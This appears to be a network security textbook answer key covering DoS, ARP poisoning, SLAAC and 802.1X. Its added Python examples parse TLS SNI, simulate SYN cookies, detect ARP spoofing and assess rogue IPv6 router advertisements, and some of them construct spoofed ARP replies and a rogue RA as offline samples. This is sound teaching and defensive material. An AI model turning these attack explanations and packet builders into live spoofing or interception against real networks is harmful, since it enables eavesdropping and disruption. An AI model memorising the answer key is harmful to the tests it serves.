4.1 Introduction
1. a) Explain the four general goals for secure networking.
These four goals include availability, confidentiality, functionality, and access control.
Availability means that authorized users have access to information, services, and network resources.
Confidentiality means preventing unauthorized users from gaining information about the network’s structure, data flowing across the network, network protocols used, or packet header values.
Functionality means preventing attackers from altering the capabilities or operation of the network.
Access control is the policy-driven control of access to systems, data, and dialogues.
b) How can information be gathered from encrypted network traffic?
The payload of an SSL/TLS session cannot be read without the session keys. A great deal of metadata remains visible to anyone on the path, however: the sender's and receiver's IP addresses, the DNS request that resolved the hostname, the port numbers, the timing and quantity of data sent in each direction, and (unless Encrypted Client Hello is in use) the hostname itself, because the TLS ClientHello carries the Server Name Indication (SNI) in cleartext. So even when the traffic is encrypted, an attacker can still see which sites are visited, how much data is sent or received, and which port numbers (and therefore which services) are used.
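The metadata leak described above can be seen directly in the first message of a TLS connection. The following Python parser, an added example that is not part of the original answer key, pulls the offered cipher suites and the Server Name Indication out of a TLS 1.2 ClientHello, which is what a passive observer reads before any encryption starts. The ClientHello itself is built by the script with a made-up hostname; nothing here is captured traffic.

```python
import struct

def build_client_hello(hostname, cipher_suites=(0xC02F, 0xC030)):
    """Constructed sample: a minimal TLS 1.2 ClientHello record that carries an SNI extension."""
    name = hostname.encode("ascii")
    sni_entry = b"\x00" + struct.pack("!H", len(name)) + name          # name_type 0 = host_name
    sni_list = struct.pack("!H", len(sni_entry)) + sni_entry
    sni_ext = struct.pack("!HH", 0x0000, len(sni_list)) + sni_list      # extension type 0 = server_name
    extensions = struct.pack("!H", len(sni_ext)) + sni_ext
    suites = b"".join(struct.pack("!H", s) for s in cipher_suites)
    body = (b"\x03\x03"                                  # client_version: TLS 1.2
            + b"\x11" * 32                               # client random (fixed for the sample)
            + b"\x00"                                    # session_id length 0
            + struct.pack("!H", len(suites)) + suites
            + b"\x01\x00"                                # one compression method: null
            + extensions)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body   # handshake type 1 = ClientHello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake

def parse_client_hello(record):
    """Return what a passive observer learns from a ClientHello: version, cipher suites and SNI."""
    if len(record) < 5 or record[0] != 0x16:
        return None                                     # not a TLS handshake record
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if len(hs) < 4 or hs[0] != 0x01:
        return None                                     # not a ClientHello
    info = {"version": hs[4:6].hex(), "cipher_suites": [], "sni": None}
    p = 4 + 2 + 32                                      # skip handshake header, version, random
    p += 1 + hs[p]                                      # session_id
    cs_len = struct.unpack("!H", hs[p:p + 2])[0]; p += 2
    info["cipher_suites"] = [struct.unpack("!H", hs[i:i + 2])[0] for i in range(p, p + cs_len, 2)]
    p += cs_len
    p += 1 + hs[p]                                      # compression methods
    if p + 2 > len(hs):
        return info                                     # no extensions present
    ext_len = struct.unpack("!H", hs[p:p + 2])[0]; p += 2
    end = min(p + ext_len, len(hs))
    while p + 4 <= end:
        etype, elen = struct.unpack("!HH", hs[p:p + 4]); p += 4
        data = hs[p:p + elen]; p += elen
        if etype == 0x0000 and len(data) >= 2:          # server_name extension, sent in the clear
            q = 2                                       # skip ServerNameList length
            while q + 3 <= len(data):
                ntype, nlen = data[q], struct.unpack("!H", data[q + 1:q + 3])[0]; q += 3
                if ntype == 0:
                    info["sni"] = data[q:q + nlen].decode("ascii", "replace")
                    break
                q += nlen
    return info
```

Run against a real capture, the same parser works on the first bytes of the TCP payload to port 443. TLS 1.3 still sends the ClientHello and its SNI in the clear; only Encrypted Client Hello hides the name.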
c) Give an example of how new technology has made networks less secure.
Answers will vary. For example, newer cell phones have the ability to allow wireless laptops to tether themselves to the cell phone and share their Internet connectivity. Allowing cell phones into the corporate network completely circumvents access control procedures, firewalls, antivirus protection, data loss prevention systems, and so on.
d) How does the castle model relate to secure networking?
The traditional castle model of network defense had the good guys on the inside, and the attackers on the outside. There was a well-guarded single point of entry. All network administrators had to do was secure this point of entry and attackers would be stopped.
e) What is meant by “death of the perimeter?”
The “death of the perimeter” is a phrase network administrators use to convey that the castle model no longer describes real networks. With wireless links, mobile devices, remote workers, business partners, and hosted services, it is impractical, if not impossible, to force all of an organization's information through a single point that can be guarded, so security can no longer be concentrated at one border.
f) How does the city model relate to secure networking?
The city model has no distinct perimeter, and there are multiple ways of entering the network. Like a real city, who you are will determine which buildings you will be able to access. In technical terms, this will mean more internal intrusion detection systems, virtual LANs, central authentication servers, and encrypted internal traffic.
4.2 Denial-of-Service (DoS) Attacks
2. a) What is a denial-of-service attack?
A DoS attack attempts to make a server or network unavailable to legitimate users. In terms of the general goals discussed earlier, DoS attacks are ways of reducing availability.
b) Other than a DoS attack, what could cause a company’s webserver crash?
Faulty coding (for example, a memory leak or an unhandled input that crashes the server process), or a sudden surge of legitimate visitors after a referral from a high-traffic site (a “flash crowd”).
c) What are the main goals of DoS attacks?
The ultimate goal of a DoS attack is to cause harm. For corporations, this can come in the form of losses related to online sales, industry reputation, employee productivity, or customer loyalty. DoS attacks can cause harm by (1) stopping a critical service, or (2) slowly degrading services over time.
d) Is a slow degradation of service worse than a total stoppage? Why?
An attack that slowly degrades services is more difficult to detect because there isn’t an abrupt change in service quality. Network administrators cannot see a clear distinction between genuine growth in network traffic and a progressive DoS attack. They may be forced into unnecessary capital expenditures for additional bandwidth, hardware, and software.
Methods of DoS Attacks
Direct and Indirect Attacks
3. a) What is the difference between a direct and indirect DoS attack?
A direct attack occurs when an attacker tries to flood a victim with a stream of packets directly from the attacker’s computer. An indirect attack tries to flood the victim computer in the same way, but the attacker’s IP address is spoofed (i.e., faked) and the attack appears to come from another computer.
b) What is backscatter?
Backscatter is the stream of responses (for example, SYN/ACK segments or ICMP error messages) that a victim sends back to the spoofed source addresses used in an indirect attack. Those responses land on hosts that never sent anything, so an unintended third party is flooded inadvertently.
c) What types of packets can be sent as part of a DoS attack?
The attacker can use almost any packet type that the victim must spend resources processing; common choices are TCP SYN segments, ICMP echo requests, UDP datagrams, and HTTP requests.
d) Describe a SYN flood.
A SYN flood, or half-open TCP attack, happens when the attacker sends a large number of TCP SYN segments to the victim server. Each SYN begins a TCP connection-opening process on the server, which sets aside RAM and other resources (a slot in its connection backlog) and sends back a SYN/ACK segment. The attacker never completes the opening by sending the final ACK, and usually spoofs the source addresses so that no real host answers. As the attacker keeps sending SYNs, the victim keeps setting aside resources until its backlog is exhausted and it refuses new connections, even from legitimate users (older systems simply crashed).
e) How does a DDoS attack work?
A distributed DoS (DDoS) attack is the most common form of DoS attack that uses intermediaries. The attacker compromises many hosts (bots) and commands them to attack the victim. First, the attacker's identity is hidden behind the layers of bots that actually send the traffic. Second, controlling thousands of bots gives the attacker far more bandwidth and processing power than a single machine, enough to overwhelm the victim.
f) What does a handler do?
Handlers are an additional layer of compromised hosts that are used to manage large groups of bots. Handlers can direct bots to send a variety of different packets depending on the service being targeted.
Reflected Attack
4. a) How does a P2P redirect attack work?
A peer-to-peer (P2P) redirect attack uses many hosts to overwhelm a victim using normal P2P traffic (Figure 4-7, Step 1). A P2P redirect attack differs from a traditional DDoS attack in several ways. The attacker does not have to control each of the hosts (i.e., make them bots) used to attack the victim. The attacker just needs to convince the hosts to redirect their legitimate P2P traffic (Step 2) from the P2P server to the victim (Step 3).
b) How does a reflected attack work?
A reflected attack uses responses from legitimate services to flood a victim. The attacker sends requests to existing legitimate servers with the source address spoofed to be the victim's (Step 1). The servers then send all of their responses to the victim (Step 2). Unlike a P2P redirect attack, there is no redirection of traffic: the servers are simply answering what look like normal requests. Services whose responses are much larger than the requests (DNS and NTP, for example) also give the attacker amplification.
c) What is a DRDoS attack, and how does it work?
Using a botnet to send the spoofed requests in a reflected attack against legitimate services is known as a distributed reflected denial-of-service (DRDoS) attack. The bots spread the request load across many sources, and the reflecting servers hide the bots' addresses from the victim, which only ever sees traffic from legitimate servers.
d) What is a Smurf flood?
A Smurf flood is a variation of a reflected attack that takes advantage of an incorrectly configured network device (a router that forwards IP directed broadcasts into its network) to flood a victim. The attacker sends an ICMP echo request with the victim's spoofed source address to the network's broadcast address (Step 1). The network device forwards the echo request to all internal hosts (Step 2). All internal hosts respond to the spoofed ICMP echo request (Step 3) and the victim is flooded.
e) What type of packet is sent in a Smurf flood? Why?
ICMP echo requests. The attacker benefits from a multiplier (amplification) effect because each single request is answered by every host on the broadcast segment (Step 4); a segment of 200 hosts turns one packet into 200.
f) How could a malformed packet cause a host to crash?
An attacker could send a malformed packet that the victim's network stack was never written to handle. For example, ping of death is a well-known older attack that uses an oversized ICMP echo request (fragments that reassemble to more than the 65,535-byte IP maximum) to crash the victim's operating system.
Defending Against Denial-of-Service (DoS) Attacks
5. a) What is black holing?
Black holing is when a firm (or its ISP) drops all IP packets arriving from an attacker's source address, typically by adding a null route for it.
b) Is black holing an effective defense against DoS attacks? Why?
Black holing an attacker is not a good long-term strategy because attackers can quickly change source IP addresses, and a spoofed or distributed attack does not come from any single address in the first place. (Black holing the victim's own address at the ISP stops the flood from saturating links but completes the DoS, so it is a last resort.)
c) How can the effects of SYN floods be mitigated?
The effects of SYN floods can be mitigated by validating the TCP handshake before committing server resources (for example, with SYN cookies or a firewall that performs false opens), by rate limiting, or even by black holing.
d) What is a false opening?
A false open occurs when a SYN segment arrives and the firewall itself sends back the SYN/ACK segment, without passing the SYN on to the target server. Only if the client completes the handshake with a valid ACK does the firewall open the connection to the server, so half-open connections from an attacker never consume server resources.
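Validating the handshake before committing resources is the idea behind both SYN cookies and a firewall's false opens. The Python simulation below is an added example, not code from the original text: it contrasts a naive server that stores state per half-open connection with a stateless server whose initial sequence number is an HMAC-based cookie, floods both with SYNs from constructed, spoofed addresses, and then checks whether a legitimate client can still connect. The cookie layout (8-bit time counter plus 24-bit MAC), the secret, the addresses and the backlog size are all assumptions for the demonstration; real kernels also encode the client's MSS in the cookie.

```python
import hashlib, hmac, os

class HalfOpenTable:
    """Naive server: each SYN occupies a backlog slot until the final ACK arrives (or never does)."""
    def __init__(self, backlog):
        self.backlog = backlog
        self.pending = {}                     # (src_ip, src_port) -> server ISN

    def on_syn(self, src_ip, src_port):
        if len(self.pending) >= self.backlog:
            return None                       # backlog exhausted: the SYN is dropped
        isn = int.from_bytes(os.urandom(4), "big")
        self.pending[(src_ip, src_port)] = isn
        return isn                            # sent back in the SYN/ACK

    def on_ack(self, src_ip, src_port, ack):
        isn = self.pending.pop((src_ip, src_port), None)
        return isn is not None and ack == (isn + 1) & 0xFFFFFFFF

class SynCookieServer:
    """Stateless alternative: the ISN is an HMAC over the connection 4-tuple and a coarse
    time counter, so the server keeps no state until a client returns a valid final ACK."""
    def __init__(self, secret, dst_ip, dst_port, window=64):
        self.secret, self.dst, self.window = secret, (dst_ip, dst_port), window
        self.established = set()

    def _cookie(self, src_ip, src_port, counter):
        msg = f"{src_ip}:{src_port}:{self.dst[0]}:{self.dst[1]}:{counter}".encode()
        mac = hmac.new(self.secret, msg, hashlib.sha256).digest()
        return ((counter & 0xFF) << 24) | int.from_bytes(mac[:3], "big")   # 8-bit counter || 24-bit MAC

    def on_syn(self, src_ip, src_port, now):
        return self._cookie(src_ip, src_port, int(now) // self.window)      # nothing is stored

    def on_ack(self, src_ip, src_port, ack, now):
        isn = (ack - 1) & 0xFFFFFFFF
        current = int(now) // self.window
        for counter in (current, current - 1):                              # tolerate one window of delay
            if (counter & 0xFF) == isn >> 24 and self._cookie(src_ip, src_port, counter) == isn:
                self.established.add((src_ip, src_port))
                return True
        return False

def simulate_syn_flood(n_attack=10000, backlog=256):
    """Flood both servers with SYNs from spoofed sources that never complete the handshake,
    then check whether one legitimate client can still connect. All addresses are constructed."""
    naive = HalfOpenTable(backlog)
    cookies = SynCookieServer(b"rotate-this-secret-regularly", "203.0.113.10", 443)
    for i in range(n_attack):
        src = f"198.51.100.{i % 250 + 1}"
        naive.on_syn(src, 1024 + i)
        cookies.on_syn(src, 1024 + i, now=1000.0)
    isn = naive.on_syn("192.0.2.7", 50000)
    naive_ok = isn is not None and naive.on_ack("192.0.2.7", 50000, isn + 1)
    isn = cookies.on_syn("192.0.2.7", 50000, now=1005.0)
    cookie_ok = cookies.on_ack("192.0.2.7", 50000, isn + 1, now=1006.0)
    forged_ok = cookies.on_ack("192.0.2.7", 50001, 0x12345678, now=1006.0)   # guessed ACK, no SYN sent
    return {"naive_accepts": naive_ok, "cookie_accepts": cookie_ok,
            "forged_accepted": forged_ok, "half_open_slots_used": len(naive.pending)}
```

On Linux the same mechanism is enabled with net.ipv4.tcp_syncookies=1 and takes over once the listen backlog overflows; a false-open firewall moves the same validation one hop upstream of the server.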
e) Why is rate limiting a good way to reduce the damage of some DoS attacks?
Rate limiting can be used to reduce a certain type of traffic to a reasonable amount. This is good if an attack is aimed at a single server because it keeps transmission lines at least partially open for other communication.
f) Why is it limited in effectiveness?
Rate limiting frustrates both attackers and legitimate users, because it cannot tell the two apart. It helps, but it does not solve the problem.
g) Why is DoS protection a community problem, not just a problem for individual victim firms to solve?
DoS attacks are community problems that can only be stopped with the help of ISPs and of the organizations whose computers are taken over as bots and used to attack other firms. A DoS attack may unintentionally originate from an unsuspecting firm. Working together, firms can stop attacks from leaving their networks (for example, by filtering outbound packets with spoofed source addresses) before they even reach their target.
4.3 ARP Poisoning
Normal ARP Operation
6. a) Why do hosts use ARP?
Address Resolution Protocol (ARP) is used to resolve 32-bit IP addresses (e.g., 55.91.56.21) into 48-bit local MAC addresses (e.g., 01-1C-23-0E-1D-41). A host needs the MAC address of the next hop on the same LAN (the destination host or the gateway) before it can frame an IP packet for delivery. Hosts build their ARP tables (caches) from the ARP requests and replies they exchange.
b) Can ARP poisoning be used outside the LAN? Why not?
Typically not. ARP requests are sent as link-layer broadcasts, which routers do not forward, so ARP traffic never leaves the LAN. Packets for IP addresses outside the LAN are sent to the gateway's MAC address and routed from there, so an attacker can only poison the ARP tables of hosts on a LAN it is connected to.
c) Why do hosts send ARP requests?
If a host (or the gateway) needs to deliver a packet to an internal host (10.0.0.1), it broadcasts an ARP request to every host on the LAN asking who has that IP address (Step 1). Only the host with the requested IP address replies, with its MAC address; all other hosts ignore the request (Step 2). Thus, hosts use ARP requests to resolve IP addresses into MAC addresses.
d) What is ARP spoofing?
ARP spoofing uses false ARP replies to map any IP address to any MAC address. Spoofed ARP replies can be broadcast to other hosts on the LAN.
e) How could an attacker use ARP spoofing to manipulate host ARP tables?
ARP requests and replies do not require authentication or verification. All hosts trust all ARP replies. Spoofed ARP replies are broadcast to other hosts on the LAN. This allows an attacker to manipulate ARP tables on all LAN hosts.
ARP Poisoning
7. a) Explain ARP poisoning?
ARP poisoning reroutes traffic for a man-in-the-middle (MITM) attack by sending unsolicited false ARP replies to all other hosts. Each victim records the attacker's MAC address against another host's IP address, so frames intended for that host are delivered to the attacker instead. Essentially, the attacker can reroute all internal traffic as desired.
b) Why does the attacker have to send a continuous stream of unrequested ARP replies?
The attacker must send a continuous stream of unsolicited ARP replies to all hosts on the LAN. Otherwise, as cached entries time out and hosts send fresh ARP requests, they would quickly learn the true MAC addresses of the other hosts again.
c) Do switches record IP addresses? Why not?
Switches only look at MAC addresses. They forward frames based on the destination MAC address and do not inspect the IP addresses inside, so an ordinary switch cannot tell that the IP-to-MAC mapping in an ARP reply being pushed out to the other hosts is wrong. (Managed switches with Dynamic ARP Inspection are the exception: they validate ARP replies against a DHCP snooping database.)
d) Does the attacker have to poison the gateway’s ARP tables too? Why?
Yes, after the attacker has successfully rerouted host traffic, it needs to reroute the traffic coming to, and from, the gateway. It uses a similar spoofed ARP reply to poison the gateway. The attacker sends a continuous stream of spoofed ARP replies to the gateway telling it that all other internal hosts are at C3-C3-C3-C3-C3-C3 (Step 3).
e) Why does all network traffic go through the attacker after poisoning the network?
If the attacker has successfully used spoofed ARP replies to record false entries in the ARP tables of all internal hosts and the gateway, then all traffic sent from internal hosts to the gateway goes to the attacker (Step 4), and all traffic from the gateway to internal hosts also goes to the attacker, which forwards it on as part of the MITM attack (Step 5).
ARP DoS Attack
8. a) How can ARP poisoning be used as a DoS attack?
Spoofed ARP replies can be used to stop all traffic leaving the local network as part of an ARP DoS attack. The attacker sends all internal hosts a continuous stream of unsolicited spoofed ARP replies saying that the gateway (10.0.0.4) is at E5-E5-E5-E5-E5-E5 (Step 1). Hosts record the gateway's IP address against this nonexistent MAC address (Step 2), so every frame destined for the gateway is sent to an address no device answers, and nothing gets in or out of the LAN.
Preventing ARP Poisoning
b) How can static IP and ARP tables be used to prevent ARP poisoning?
ARP poisoning can be prevented by using static IP tables and static ARP tables. Static ARP entries are set manually and are not updated by ARP replies, so a spoofed reply cannot overwrite them. Each computer has a known static IP address that does not change, and all hosts on the LAN know which IP address is assigned to each MAC address (host).
c) Can static IP and ARP tables be effectively used in large networks? Why not?
Most organizations are too large, change too quickly, and lack the experience to effectively manage static IP and ARP tables. The workload would be overwhelming.
d) Why would limiting local access prevent DoS attacks?
Limiting local access prevents ARP attacks because ARP is confined to the LAN: only a host that is physically plugged into a wall jack or associated with the wireless network can send ARP replies to internal hosts. Controlling who can connect (for example, with 802.1X port-based authentication) therefore keeps outside attackers from reaching the hosts at all.
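Because an ordinary switch cannot see the problem, detection has to come from something that does inspect ARP. The Python monitor below is an added example, not code from the original text: it parses raw Ethernet/ARP frames, remembers which IP addresses a request was broadcast for, and raises an alert on replies nobody asked for, on bindings that change, and on replies that contradict an administrator-pinned static entry for the gateway. All frames and addresses are constructed in the script.

```python
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

def mac_str(b): return "-".join(f"{x:02X}" for x in b)
def ip_str(b): return ".".join(str(x) for x in b)
def mac_bytes(s): return bytes(int(x, 16) for x in s.split("-"))
def ip_bytes(s): return bytes(int(x) for x in s.split("."))

def parse_arp(frame):
    """Parse an Ethernet II frame carrying an Ethernet/IPv4 ARP packet (RFC 826); None otherwise."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", frame[22:42])
    return {"op": op, "sha": mac_str(sha), "spa": ip_str(spa), "tha": mac_str(tha), "tpa": ip_str(tpa)}

def build_arp(op, sha, spa, tha, tpa):
    """Constructed sample frame (not captured traffic); requests are broadcast, replies unicast."""
    dst = "FF-FF-FF-FF-FF-FF" if op == ARP_REQUEST else tha
    eth = mac_bytes(dst) + mac_bytes(sha) + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
           + mac_bytes(sha) + ip_bytes(spa) + mac_bytes(tha) + ip_bytes(tpa))
    return eth + arp

class ArpMonitor:
    """Passive detector: flags replies nobody asked for and IP-to-MAC bindings that change
    or contradict administrator-pinned (static) entries. Caches bindings per IP, like a host."""
    def __init__(self, static_bindings=None):
        self.static = dict(static_bindings or {})   # IP -> MAC that must never change
        self.learned = {}                           # IP -> MAC seen in earlier replies
        self.awaiting_reply = set()                 # IPs for which a request was broadcast
        self.alerts = []

    def observe(self, frame):
        arp = parse_arp(frame)
        if arp is None:
            return
        if arp["op"] == ARP_REQUEST:
            self.awaiting_reply.add(arp["tpa"])     # a reply for this IP is now expected
            return
        if arp["op"] != ARP_REPLY:
            return
        ip, mac = arp["spa"], arp["sha"]
        if ip in self.awaiting_reply:
            self.awaiting_reply.discard(ip)
        else:
            self.alerts.append(f"unsolicited reply: {ip} is-at {mac}")
        if ip in self.static and self.static[ip] != mac:
            self.alerts.append(f"static binding violated: {ip} is pinned to {self.static[ip]}, reply claims {mac}")
        elif ip in self.learned and self.learned[ip] != mac:
            self.alerts.append(f"binding changed: {ip} moved from {self.learned[ip]} to {mac}")
        self.learned[ip] = mac

def run_demo():
    """Host 10.0.0.1 resolves the gateway 10.0.0.4 normally; then an attacker starts poisoning."""
    gw_mac, host_mac, attacker_mac = "A1-A1-A1-A1-A1-A1", "B2-B2-B2-B2-B2-B2", "C3-C3-C3-C3-C3-C3"
    mon = ArpMonitor(static_bindings={"10.0.0.4": gw_mac})
    frames = [
        build_arp(ARP_REQUEST, host_mac, "10.0.0.1", "00-00-00-00-00-00", "10.0.0.4"),  # legitimate request
        build_arp(ARP_REPLY, gw_mac, "10.0.0.4", host_mac, "10.0.0.1"),                # legitimate reply
        build_arp(ARP_REPLY, attacker_mac, "10.0.0.4", host_mac, "10.0.0.1"),          # spoofed: "gateway is at C3..."
        build_arp(ARP_REPLY, attacker_mac, "10.0.0.1", gw_mac, "10.0.0.4"),            # poisons the gateway too
    ]
    for f in frames:
        mon.observe(f)
    return mon.alerts
```

Gratuitous ARP (a host announcing its own address after a change or a cluster failover) is also an unsolicited reply, so in production the first rule is tuned with an allow list rather than treated as a hard alarm. On a managed switch the equivalent check is Dynamic ARP Inspection; on a single critical host the static entry is created with ip neigh add 10.0.0.4 lladdr a1:a1:a1:a1:a1:a1 dev eth0 nud permanent (Linux) or arp -s (Windows).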
SLAAC Attack
9. a) What is a SLAAC attack?
A Stateless Address Autoconfiguration (SLAAC) attack is an attack on the functionality and confidentiality of a network. It occurs when a rogue IPv6 router is introduced to an IPv4-only network whose hosts nevertheless have IPv6 enabled. The hosts autoconfigure IPv6 addresses from the rogue router's advertisements and prefer them, so their traffic is rerouted through the rogue router, creating the potential for a MITM attack.
b) Why do hosts automatically prefer IPv6 addressing?
Traffic on the existing IPv4 network is rerouted through the rogue IPv6 router because modern operating systems enable IPv6 by default and their address selection rules prefer IPv6 over IPv4 when both are available. Microsoft Windows 7, Microsoft Server 2008, and Apple OS X all shipped with IPv6 fully enabled.
c) What has to be introduced to a network for a SLAAC attack to work?
Only the introduction of a rogue IPv6 router to the LAN is needed; no host has to be compromised. With the rogue router in place, all internal traffic is automatically rerouted (Step 1). This happens because the rogue router advertises its presence using Router Advertisement (RA) messages over ICMPv6 (Step 2). Hosts receive the RAs, derive an IPv6 address from the advertised prefix using Stateless Address Autoconfiguration (SLAAC), and install the rogue router as their default IPv6 router.
d) Would a SLAAC attack work on an existing IPv6 network? Why not?
Not in the same way. The attack as described targets networks that are IPv4-only but whose hosts have IPv6 enabled, so there is no legitimate IPv6 router to compete with. On an existing IPv6 network the rogue router's advertisements conflict with the legitimate router's, and the network administrator would quickly see the conflicts. The administrator could also use managed address assignment, pointing hosts at a specific legitimate DHCPv6 server instead of relying on SLAAC. On either kind of network, RA Guard on the access switches (RFC 6105) drops router advertisements arriving on ports where no router is supposed to be.
e) Could a rogue router direct internal traffic to an outside rogue DNS server? How?
Yes. Router advertisements can carry a Recursive DNS Server (RDNSS) option, so the rogue router can hand internal hosts a false DNS server along with their IPv6 configuration as part of the SLAAC attack. With a false DNS server the attacker can resolve any name to an address of its choosing and redirect internal users to any number of phishing sites.
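The router advertisement is the whole attack, so it is worth seeing what one contains. The Python code below is an added example, not from the original text: it builds an ICMPv6 Router Advertisement with a source link-layer address option, a Prefix Information option with the autonomous (SLAAC) flag set, and an RDNSS option naming a DNS server, then parses it back and lists why it should be treated as rogue on a LAN where no IPv6 router is authorized. The addresses and the attacker's MAC are constructed, the ICMPv6 checksum is left at zero (a real sender computes it over an IPv6 pseudo-header), and the option layouts follow RFC 4861 and RFC 8106.

```python
import struct, ipaddress

ND_ROUTER_ADVERT = 134
OPT_SRC_LLADDR, OPT_PREFIX_INFO, OPT_RDNSS = 1, 3, 25

def build_ra(src_mac, prefix, dns_servers, router_lifetime=1800):
    """Constructed ICMPv6 RA (checksum left 0): header + source link-layer, prefix and RDNSS options."""
    hdr = struct.pack("!BBHBBHII", ND_ROUTER_ADVERT, 0, 0, 64, 0x00, router_lifetime, 0, 0)
    opts = bytes([OPT_SRC_LLADDR, 1]) + bytes(int(x, 16) for x in src_mac.split("-"))
    net = ipaddress.IPv6Network(prefix)
    opts += (bytes([OPT_PREFIX_INFO, 4, net.prefixlen, 0xC0])          # flags: L (on-link) | A (autonomous)
             + struct.pack("!III", 2592000, 604800, 0) + net.network_address.packed)
    if dns_servers:
        opts += (bytes([OPT_RDNSS, 1 + 2 * len(dns_servers)]) + struct.pack("!HI", 0, 1800)
                 + b"".join(ipaddress.IPv6Address(d).packed for d in dns_servers))
    return hdr + opts

def parse_ra(icmpv6):
    """Decode an RA into what a host would act on. Option lengths are in units of 8 bytes."""
    if len(icmpv6) < 16 or icmpv6[0] != ND_ROUTER_ADVERT:
        return None
    hop_limit, flags, router_lifetime, reachable, retrans = struct.unpack("!BBHII", icmpv6[4:16])
    ra = {"router_lifetime": router_lifetime, "managed": bool(flags & 0x80), "other": bool(flags & 0x40),
          "src_mac": None, "prefixes": [], "dns": []}
    p = 16
    while p + 2 <= len(icmpv6):
        otype, olen = icmpv6[p], icmpv6[p + 1] * 8
        if olen == 0 or p + olen > len(icmpv6):
            ra["malformed"] = True
            break
        body = icmpv6[p + 2:p + olen]
        if otype == OPT_SRC_LLADDR and olen == 8:
            ra["src_mac"] = "-".join(f"{b:02X}" for b in body[:6])
        elif otype == OPT_PREFIX_INFO and olen == 32:
            plen, pflags = body[0], body[1]
            prefix = ipaddress.IPv6Address(body[14:30])
            ra["prefixes"].append((f"{prefix}/{plen}", bool(pflags & 0x40)))   # True = SLAAC allowed
        elif otype == OPT_RDNSS and olen >= 24:
            for i in range(6, len(body) - 15, 16):                            # addresses follow lifetime
                ra["dns"].append(str(ipaddress.IPv6Address(body[i:i + 16])))
        p += olen
    return ra

def assess_ra(ra, authorized_router_macs):
    """Reasons to treat an RA as rogue. On an IPv4-only LAN pass an empty set: no RA is legitimate."""
    reasons = []
    if ra.get("malformed"):
        reasons.append("malformed option encoding")
    if ra["src_mac"] not in authorized_router_macs:
        reasons.append(f"RA from unauthorized router {ra['src_mac']}")
    if any(autonomous for _, autonomous in ra["prefixes"]):
        reasons.append("advertises a SLAAC (A-flag) prefix: hosts will autoconfigure addresses from it")
    if ra["dns"]:
        reasons.append(f"pushes DNS servers via RDNSS: {', '.join(ra['dns'])}")
    return reasons

def run_demo():
    """Rogue RA as in the SLAAC attack: unknown router, SLAAC prefix, RDNSS pointing at the attacker."""
    ra = parse_ra(build_ra("C3-C3-C3-C3-C3-C3", "2001:db8:bad::/64", ["2001:db8:bad::53"]))
    return ra, assess_ra(ra, authorized_router_macs=set())
```

On a live network the same parser would be fed from a raw ICMPv6 socket or a capture filter for icmp6 type 134; the useful long-term fix is still RA Guard on the switch ports (or disabling IPv6 on hosts where it is genuinely unused) rather than alerting after the fact.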
4.4 Access Control for Networks
LAN Connections
10. a) What is the main access threat to Ethernet LANs?
Traditionally, Ethernet LANs offered no access security. Any intruder who entered a corporate building could walk up to any wall jack and plug in a notebook computer. The intruder would then have unfettered access to the LAN’s computers, bypassing the site’s border firewall. This was a complete breakdown in access control.
b) What is the main access threat to 802.11 wireless LANs?
An intruder can connect by radio to an unprotected wireless access point.
c) Why is the access threat to WLANs more severe?
The intruder does not even have to enter the building as he or she needs to do in wired LANs. In WLANs, attackers can connect to unprotected (or poorly protected) wireless access points and bypass border router security from outside of the physical premises of the company.
d) Is eavesdropping usually more of a concern for wired LANs, wireless LANs, or both?
It is a concern in both, but it is rare in wired LANs, where an eavesdropper must be physically plugged into the LAN (and an ordinary switch delivers frames only to their destination port), and common in wireless LANs, where anyone in radio range can capture frames.
4.5 Ethernet Security
Ethernet and 802.1X
11. a) Why is 802.1X called Port-Based Access Control?
802.1X is called port-based access control because security is implemented on specific ports of an Ethernet workgroup switch: each port passes only authentication traffic until the device plugged into it has been authenticated, after which the port is opened for normal traffic.
b) Where is the heavy authentication work done?
The heavy authentication work is done on a central authentication server, rather than on the switch.
c) What are the three benefits of using a central authentication server?
Reduced cost: Having a central authentication server reduces the work required to maintain multiple authentication databases updated, as well as reduces the authentication processing on individual switches.
Consistency: Credentials are checked against the same authentication database every time, versus relying on possibly outdated authentication databases residing on switches throughout the network.
Immediacy: Central authentication allows the ability to rapidly change access controls, especially important when trying to restrict access to a recently fired employee or rogue PC that may be negatively impacting the network.
d) Which device is the verifier? Explain. (Trick question.)
There is no verifier in 802.1X. Instead, the verifier responsibilities are shared between the workgroup switch, known as the authenticator, and the central authentication server.
e) Which device is called the authenticator?
The workgroup switch is called the authenticator.
The Extensible Authentication Protocol (EAP)
12. a) How does an EAP session start?
When the switch detects a device on a port (or the device sends an EAPOL-Start frame), the switch sends an EAP Request/Identity to the supplicant. The supplicant's EAP Response/Identity is then relayed to the RADIUS server inside a RADIUS Access-Request. This begins the EAP session.
b) What types of messages carry requests for authentication information and responses to these requests?
EAP request and response messages.
c) Describe how the central authentication server tells the authenticator that the supplicant is acceptable.
It sends an EAP Success message (carried to the switch inside a RADIUS Access-Accept) if the supplicant is acceptable, but an EAP Failure message (inside a RADIUS Access-Reject) if the supplicant is not.
d) How does the authenticator pass this information on to the supplicant?
The authenticator forwards the EAP Success or EAP Failure message to the supplicant in an EAPOL frame. On success it opens the port for normal traffic; on failure it keeps the port closed.
e) In what sense is EAP extensible?
EAP is considered extensible because new authentication methods (such as smart cards, MS-CHAP, digital certificates, and methods built on Diffie–Hellman key agreement) can be added without modifying the general format of the underlying EAP messages; only the contents of the request and response messages change with the authentication method chosen.
f) When a new authentication method is added, what device software must be changed to use the new method?
When a new authentication method is added, the central authentication server and supplicant both need to implement the new method.
g) Why is there no need to change the operation of the authenticator when a new EAP authentication method is added, or an old EAP authentication mode is dropped?
The software on the authenticator (workgroup switch) does not have to be changed. It merely passes request and response messages through. This is good because a network will have many workgroup switches.
h) Why is this freedom from the need to make changes in the switch beneficial?
The freedom to make changes in authentication protocols is beneficial because it reduces costs that would normally be associated with upgrading authenticators if they were tied to specific authentication methods.
RADIUS Servers
